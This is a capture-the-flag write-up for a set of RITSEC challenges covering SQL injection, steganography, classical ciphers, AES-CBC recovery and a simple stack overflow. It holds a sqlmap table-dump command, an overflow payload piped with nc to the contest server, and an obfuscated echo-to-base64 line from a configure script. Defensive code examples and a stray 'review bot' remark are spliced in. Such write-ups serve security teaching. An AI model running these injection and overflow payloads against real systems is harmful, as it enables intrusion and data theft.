Space Force
The Space Force has created a portal for the public to learn about and be in awe of our most elite Space Force Fighters. Check it out at fun.ritsec.club:8005!
Open the site; it appears to offer a search function.
Capture a request and try injection:
POST /index.php HTTP/1.1
Host: fun.ritsec.club:8005
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://fun.ritsec.club:8005/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
Connection: keep-alive
Upgrade-Insecure-Requests: 1

name=The+Javelin
sqlmap -r burp.txt -D challenge -T spaceships --dump
flag:RITSEC{hey_there_h4v3_s0me_point$_3ny2Lx}
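Why the name search parameter was injectable, and the fix, shown as an added Python 3 example that is not the challenge's own code. The sqlite3 backend, the column names and the sample rows are assumptions; only the table name spaceships and the search value come from the writeup.

```python
import sqlite3

def make_db():
    # Constructed sample data; only the table name "spaceships" is from the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE spaceships (name TEXT, description TEXT)")
    db.executemany("INSERT INTO spaceships VALUES (?, ?)", [
        ("The Javelin", "constructed row"),
        ("Hidden Ship", "constructed row the search should not list"),
    ])
    return db

def search_vulnerable(db, name):
    # The input is pasted into the SQL text, so a quote character in `name`
    # closes the string literal and the remainder is parsed as SQL.
    sql = "SELECT name FROM spaceships WHERE name = '%s'" % name
    return [row[0] for row in db.execute(sql)]

def search_parameterized(db, name):
    # The driver binds `name` as a value; it is never parsed as SQL.
    sql = "SELECT name FROM spaceships WHERE name = ?"
    return [row[0] for row in db.execute(sql, (name,))]

if __name__ == "__main__":
    db = make_db()
    crafted = "x' OR '1'='1"   # constructed input containing a quote
    print("vulnerable   :", search_vulnerable(db, crafted))
    print("parameterized:", search_parameterized(db, crafted))
```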
Burn the candle on both ends
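The usual routine: a zip is hidden inside the file, so just extract it.
The zip is password-protected, though. After a very long brute force, the password turned out to be stegosaurus.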
flag:RITSEC{8U51N355-1N-7H3-Fr0N7-P4r7Y-1N-7H3-84CK}
I am a Stegosaurus
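Download the image. It will not open on Linux, possibly because the image height or width was modified. On Windows it opens directly, and the flag is at the bottom of the image.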
flag:RITSEC{th1nk_0uts1d3_th3_b0x}
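One way to test the "modified height or width" guess without switching operating systems, as an added Python 3 example that is not from the original writeup: a strict decoder rejects a PNG whose IHDR CRC no longer matches its fields, so the script checks that CRC and searches for the dimension that satisfies it. The assumption that exactly one dimension was edited, the max_dim bound and the constructed sample bytes are mine.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def parse_ihdr(png):
    """Return (width, height, other_fields, stored_crc) from raw PNG bytes."""
    if png[:8] != PNG_SIG:
        raise ValueError("not a PNG file")
    length, ctype = struct.unpack(">I4s", png[8:16])
    if ctype != b"IHDR" or length != 13:
        raise ValueError("first chunk is not a 13-byte IHDR")
    width, height = struct.unpack(">II", png[16:24])
    other = png[24:29]  # bit depth, colour type, compression, filter, interlace
    (stored_crc,) = struct.unpack(">I", png[29:33])
    return width, height, other, stored_crc

def ihdr_crc(width, height, other):
    # A chunk CRC covers the type and data fields, not the length field.
    return zlib.crc32(b"IHDR" + struct.pack(">II", width, height) + other) & 0xFFFFFFFF

def check_dimensions(png, max_dim=4096):
    """Return ("ok" | "recovered" | "unknown", width, height)."""
    w, h, other, crc = parse_ihdr(png)
    if ihdr_crc(w, h, other) == crc:
        return ("ok", w, h)
    # Assumption: exactly one of the two dimensions was edited after the CRC was written.
    for cand in range(1, max_dim + 1):
        if ihdr_crc(w, cand, other) == crc:
            return ("recovered", w, cand)
        if ihdr_crc(cand, h, other) == crc:
            return ("recovered", cand, h)
    return ("unknown", w, h)

def make_sample(width, true_height, claimed_height):
    """Constructed input: signature + IHDR whose CRC matches true_height only."""
    other = bytes([8, 2, 0, 0, 0])
    crc = ihdr_crc(width, true_height, other)
    ihdr = struct.pack(">I4sII", 13, b"IHDR", width, claimed_height) + other
    return PNG_SIG + ihdr + struct.pack(">I", crc)

if __name__ == "__main__":
    print(check_dimensions(make_sample(640, 480, 300)))
```

On a real file, pass the first 33 bytes (or the whole file) to check_dimensions and write the recovered value back into the IHDR before viewing.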
Nobody uses the eggplant emoji
This challenge takes some lateral thinking: the ciphertext consists entirely of emoji.
The challenge:
There are also underscores mixed in with the emoji, so try mapping each distinct emoji to a distinct character.
This gives:
ABCDEFCGHAIJCDEFCKLMCNELGHDCEBCGHMCBOKPCBALQGCDEFCRFQGCKIQNMLCGHMQMCGHLMMCSFMQGAEIQTCNHKGCAQCDEFCIKRMUCNHKGCAQCDEFLCSFMQGUCNHKGCAQCGHMCKALCQVMMWCXMOEYAGDCEBCKICFIOKWMICQNKOOENTCDEFLCBOKPCAQZCKBLAYKI[EL[MFLEVMKI[QNKOOEN[NEN[GHMLMQ[K[WABBMLMIYMC
Then frequency analysis gives:
IFSYOUSTHINGSYOUSARESWORTHYSOFSTHESFLAMSFIRDTSYOUSJUDTSANDWERSTHEDESTHREESQUEDTIONDPSWHATSIDSYOUSNAJEVSWHATSIDSYOURSQUEDTVSWHATSIDSTHESAIRSDBEEKSZELOCITYSOFSANSUNLAKENSDWALLOWPSYOURSFLAMSIDXSAFRICAN[OR[EUROBEAN[DWALLOW[WOW[THERED[A[KIFFERENCES
After substituting the remaining characters:
flag:RITSEC{african_or_european_swallow_wow_theres_a_difference}
Who drew on my program?
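Download the image.
A Baidu search suggests this is a reused challenge: https://github.com/dqi/ctf_writeup/tree/master/2015/tmctf/crypto200
It is very similar to that one.
That challenge also crosses out some key information and asks you to recover the flag. Here is his payload: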
#!/usr/bin/python
from Crypto.Cipher import AES
import binascii
import string
import itertools

# given
bKEY = "5d6I9pfR7C1JQt"

# use null bytes to minimize effect on output
IV = "\x00"*16

def encrypt(message, passphrase):
    aes = AES.new(passphrase, AES.MODE_CBC, IV)
    return aes.encrypt(message)

def decrypt(cipher, passphrase):
    aes = AES.new(passphrase, AES.MODE_CBC, IV)
    return aes.decrypt(cipher)

pt = "The message is protected by AES!"
ct = "fe000000000000000000000000009ec3307df037c689300bbf2812ff89bc0b49"

# find the key using the plaintext and ciphertext we know, since the IV has no effect on the decryption of the second block
for i in itertools.product(string.printable, repeat=2):
    eKEY = ''.join(i)
    KEY = bKEY + eKEY
    ptc = decrypt(binascii.unhexlify(ct), KEY)
    if ptc[16] == pt[16] and ptc[30] == pt[30] and ptc[31] == pt[31]:
        print "Got KEY: " + str(KEY)
        fKEY = KEY

pt2 = binascii.hexlify(decrypt(binascii.unhexlify(ct), fKEY))[32:]
print "Decrypting with CT mostly zeroes gives: " + pt2
print "Should be: " + binascii.hexlify(pt[16:])

# we can now recover the rest of the ciphertext ct by XOR(pt[i], decrypted[i]), since we chose ct 00 in all the positions we are going to recover
answer = ""
for i in range(13):
    pi = pt[17+i]             # letters from the plaintext
    pti = pt2[2*i+2:2*i+4]    # 2 hex letters from decryption of second block
    answer += "%02X" % (ord(pi) ^ int(pti, 16))
rct = ct[0:2] + answer.lower() + ct[28:]
print "Which means CT was: " + rct

# now we can decrypt the recovered ct and xor against the pt to recover the IV
wpt = decrypt(binascii.unhexlify(rct), fKEY)
IV = ""
for i in range(16):
    p = ord(pt[i]) ^ ord(wpt[i])
    IV += "%02X" % p
IV = binascii.unhexlify(IV)

# sanity check:
aes = AES.new(fKEY, AES.MODE_CBC, IV)
print "Sanity check: " + aes.decrypt(binascii.unhexlify(rct))

# We won!
print "The IV is: " + IV
Change bKEY to the one from our challenge:
#!/usr/bin/python
from Crypto.Cipher import AES
import binascii
import string
import itertools

# given
bKEY = "9aF738g9AkI112"

# use null bytes to minimize effect on output
IV = "\x00"*16

def encrypt(message, passphrase):
    aes = AES.new(passphrase, AES.MODE_CBC, IV)
    return aes.encrypt(message)

def decrypt(cipher, passphrase):
    aes = AES.new(passphrase, AES.MODE_CBC, IV)
    return aes.decrypt(cipher)

pt = "The message is protected by AES!"
ct = "9e00000000000000000000000000436a808e200a54806b0e94fb9633db9d67f0"

# find the key using the plaintext and ciphertext we know, since the IV has no effect on the decryption of the second block
for i in itertools.product(string.printable, repeat=2):
    eKEY = ''.join(i)
    KEY = bKEY + eKEY
    ptc = decrypt(binascii.unhexlify(ct), KEY)
    if ptc[16] == pt[16] and ptc[30] == pt[30] and ptc[31] == pt[31]:
        print "Got KEY: " + str(KEY)
        fKEY = KEY

pt2 = binascii.hexlify(decrypt(binascii.unhexlify(ct), fKEY))[32:]
print "Decrypting with CT mostly zeroes gives: " + pt2
print "Should be: " + binascii.hexlify(pt[16:])

# we can now recover the rest of the ciphertext ct by XOR(pt[i], decrypted[i]), since we chose ct 00 in all the positions we are going to recover
answer = ""
for i in range(13):
    pi = pt[17+i]             # letters from the plaintext
    pti = pt2[2*i+2:2*i+4]    # 2 hex letters from decryption of second block
    answer += "%02X" % (ord(pi) ^ int(pti, 16))
rct = ct[0:2] + answer.lower() + ct[28:]
print "Which means CT was: " + rct

# now we can decrypt the recovered ct and xor against the pt to recover the IV
wpt = decrypt(binascii.unhexlify(rct), fKEY)
IV = ""
for i in range(16):
    p = ord(pt[i]) ^ ord(wpt[i])
    IV += "%02X" % p
IV = binascii.unhexlify(IV)

# sanity check:
aes = AES.new(fKEY, AES.MODE_CBC, IV)
print "Sanity check: " + aes.decrypt(binascii.unhexlify(rct))

# We won!
print "The IV is: " + IV
flag:RITSEC{b4dcbc#g}
Talk to me
Join the channel: https://discord.gg/p7tHuSq
Search for RITSEC.
flag:RITSEC{its_like_irc-but_with_2_much_javascript}
Patch Patch
Take a look at the patch-patch-patch file:
diff -ur patch-2.7.1/src/patch.c patch-2.7.1.1/src/patch.c --- patch-2.7.1/src/patch.c 2018-11-02 01:12:30.625613158 -0400 +++ patch-2.7.1.1/src/patch.c 2018-11-02 01:13:21.498608985 -0400 @@ -1953,9 +1953,9 @@ fatal_exit (int sig) { cleanup (); -#ifdef backdoor - printf("Looks like we got a vulnerability here"); -#endif + +/* Removed a super bad vuln here */ + if (sig) exit_with_signal (sig);
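Review bot: the comment added in fatal_exit ("Removed a super bad vuln here") does not say what was removed or why, and the hunk leaves a stray blank line in front of it. The deleted lines were only a printf guarded by #ifdef backdoor, so I would drop both the comment and the blank line and record the reason for the removal in the commit message instead.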
Nothing useful there. Next, look at patch-2.7.1-10.el7.centos.src: after extracting everything, the configure script inside patch-2.7.1 contains something odd:
TEST=$(echo -e "\x55\x6b\x6c\x55\x55\x30\x56\x44\x65\x31\x5a\x56\x54\x45\x35\x54\x58\x7a\x52\x53\x4d\x31\x39\x43\x51\x55\x52\x66\x66\x51\x6f\x3d" | `echo -e "\x62\x61\x73\x65\x36\x34" -d`)
It is a bash script, so let's try running it:
echo -e "\x55\x6b\x6c\x55\x55\x30\x56\x44\x65\x31\x5a\x56\x54\x45\x35\x54\x58\x7a\x52\x53\x4d\x31\x39\x43\x51\x55\x52\x66\x66\x51\x6f\x3d" | `echo -e "\x62\x61\x73\x65\x36\x34" -d`
RITSEC{VULNS_4R3_BAD_}
flag:RITSEC{VULNS_4R3_BAD_}
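The same line can be read without executing anything from an untrusted configure script. The following is an added Python 3 example, not part of the original writeup or of the patch sources: it finds quoted runs of \xNN escapes in a build script, decodes them, and additionally tries base64 on the result. The function names and the threshold of four escapes are assumptions; the sample line is the one quoted above.

```python
import base64
import re

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
# A double-quoted string made up only of \xNN escapes (at least four of them).
QUOTED_RUN = re.compile(r'"((?:\\x[0-9a-fA-F]{2}){4,})"')

def unescape(s):
    """Turn \\xNN escapes into characters, as `echo -e` would."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)

def audit_script(text):
    """Return one finding per obfuscated string; nothing in `text` is executed."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in QUOTED_RUN.finditer(line):
            decoded = unescape(m.group(1))
            finding = {"line": lineno, "decoded": decoded}
            try:
                inner = base64.b64decode(decoded, validate=True)
                finding["base64"] = inner.decode("utf-8", "replace")
            except ValueError:   # not valid base64 (binascii.Error is a ValueError)
                pass
            findings.append(finding)
    return findings

# The line from configure, copied from the writeup.
SAMPLE = r'''TEST=$(echo -e "\x55\x6b\x6c\x55\x55\x30\x56\x44\x65\x31\x5a\x56\x54\x45\x35\x54\x58\x7a\x52\x53\x4d\x31\x39\x43\x51\x55\x52\x66\x66\x51\x6f\x3d" | `echo -e "\x62\x61\x73\x65\x36\x34" -d`)'''

if __name__ == "__main__":
    for f in audit_script(SAMPLE):
        print(f)
```

The second finding decodes to the command name itself, which is the kind of hidden command a review of build scripts should surface.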
What_Th._Fgck
The challenge gives only this:
OGK:DI_G;lqk"Kj1;"a"yao";fr3dog0o"vdtnsaoh"patsfk{+
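This is a Dvorak cipher; below is the Dvorak keyboard layout.
Just use a tool.
This gives the plaintext RITSEC{Isn't”Th1s”a”far”sup3eri0r”keyboard”layout?}
Change the double quotes to underscores and that is it.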
flag:RITSEC{Isn't_Th1s_a_far_sup3eri0r_keyboard_layout?}
RIP
This one gives an image and a piece of ciphertext:
+[----->+++<]>+.++++++++++++..----.+++.+[-->+<]>.-----------..++[--->++<]>+...---[++>---<]>.--[----->++<]>+.----------.++++++.-.+.+[->+++<]>.+++.[->+++<]>-.--[--->+<]>-.++++++++++++.--.+++[->+++++<]>-.++[--->++<]>+.-[->+++<]>-.--[--->+<]>-.++[->+++<]>+.+++++.++[->+++<]>+.----[->++<]>.[-->+<]>++.+++++++++.--[------>+<]>.--[-->+++<]>--.+++++++++++++.----------.>--[----->+<]>.-.>-[--->+<]>--.++++.---------.-.
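After decoding, it is a link: https://www.youtube.com/watch?v=F6LYOfeSWNM
That is not useful, so look at the image again. The odd thing about it is the border of small colored squares; after looking it up I learned that these are a programming language, Piet. Remove the other parts of the image
and decode it online.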
flag:RITSEC{WH4AT_TH3_P13T_1337}
Check out this cool filter
I had no idea how to approach this one and only understood it after reading an expert's writeup.
from PIL import Image

img = Image.open('CheckOutThisFilter.png').convert('RGB')
w, h = img.size
codes = []
for y in range(0, h):
    for x in range(0, w):
        r, g, b = img.getpixel((x, y))
        codes.append(b)  # collect the image's blue channel values in order
codes = codes[:51]
flag = ''
for code in codes:
    flag += chr(code - 13)
print flag
flag:RITSEC{TIL_JPEG_COMPRESSION_MESSES_WITH_RGB_VALUES}
music.png
This challenge was also eye-opening: it is a new type of music, named "bytebeat".
Use a script to extract the code from the image:
from PIL import Image

img = Image.open('music.png').convert('RGB')
w, h = img.size
r_str = ''
g_str = ''
b_str = ''
for y in range(0, h):
    for x in range(0, w):
        r, g, b = img.getpixel((x, y))
        r_str += chr(r)
        g_str += chr(g)
        b_str += chr(b)
s = r_str[:32] + g_str[:38] + b_str[:66]
print s
This gives:
(t<<3)*[8/9,1,9/8,6/5,4/3,3/2,0][[0xd2d2c7,0xce4087,0xca32c7,0x8e4008][t>>14&3.1]>>(0x3dbe4687>>((t>>10&15)>9?18:t>>10&15)*3&7.1)*3&7.1]
Run it with an online tool.
It plays a piece of music; song recognition identifies it as "Never Gonna Give You Up".
So the flag is: RITSEC{never_gonna_give_you_up}
For an introduction to bytebeat, click here.
ezpwn
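Open the binary in IDA.
The code is roughly as follows:
#include <stdio.h>

int main() {
    int x = 0;
    int y = 0;
    char buffer;                 /* as shown by IDA; gets() writes past it */
    FILE *f;

    puts("Please enter your API key");
    gets(&buffer);               /* unbounded read: this is what can change x */
    f = fopen("flag.txt", "r");
    if (x == 1) {
        /* print flag.txt one character at a time */
        while ((y = fgetc(f)) != EOF)
            putchar(y);
        fclose(f);
    }
    printf("%d\n", x);
    return 0;
}
x is initialized to 0, but the flag is only read when x = 1. The key function is gets, which can be used to modify the value of x. First we determine the offset: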
└──╼ $./ezpwn
Please enter your API key
aaaabaaacaaadaaaeaaafaaagaaaha
1633771879
Using cyclic gives an offset of 24. Write a flag.txt locally and build the input: python -c 'print "A"*24 +"\x01" ' | ./ezpwn
└──╼ $python -c 'print "A"*24 +"\x01" ' | ./ezpwn
Please enter your API key
flag{666666}
1
It works locally.
root@kali:~/pwn# python -c "print 'a'*24 + '\x01\x00\x00\x00'"| nc fun.ritsec.club 8001
Please enter your API key
RITSEC{Woah_Dud3_it's_really_that_easy?_am_i_leet_yet?}1
Got the flag.
flag:RITSEC{Woah_Dud3_it's_really_that_easy?_am_i_leet_yet?}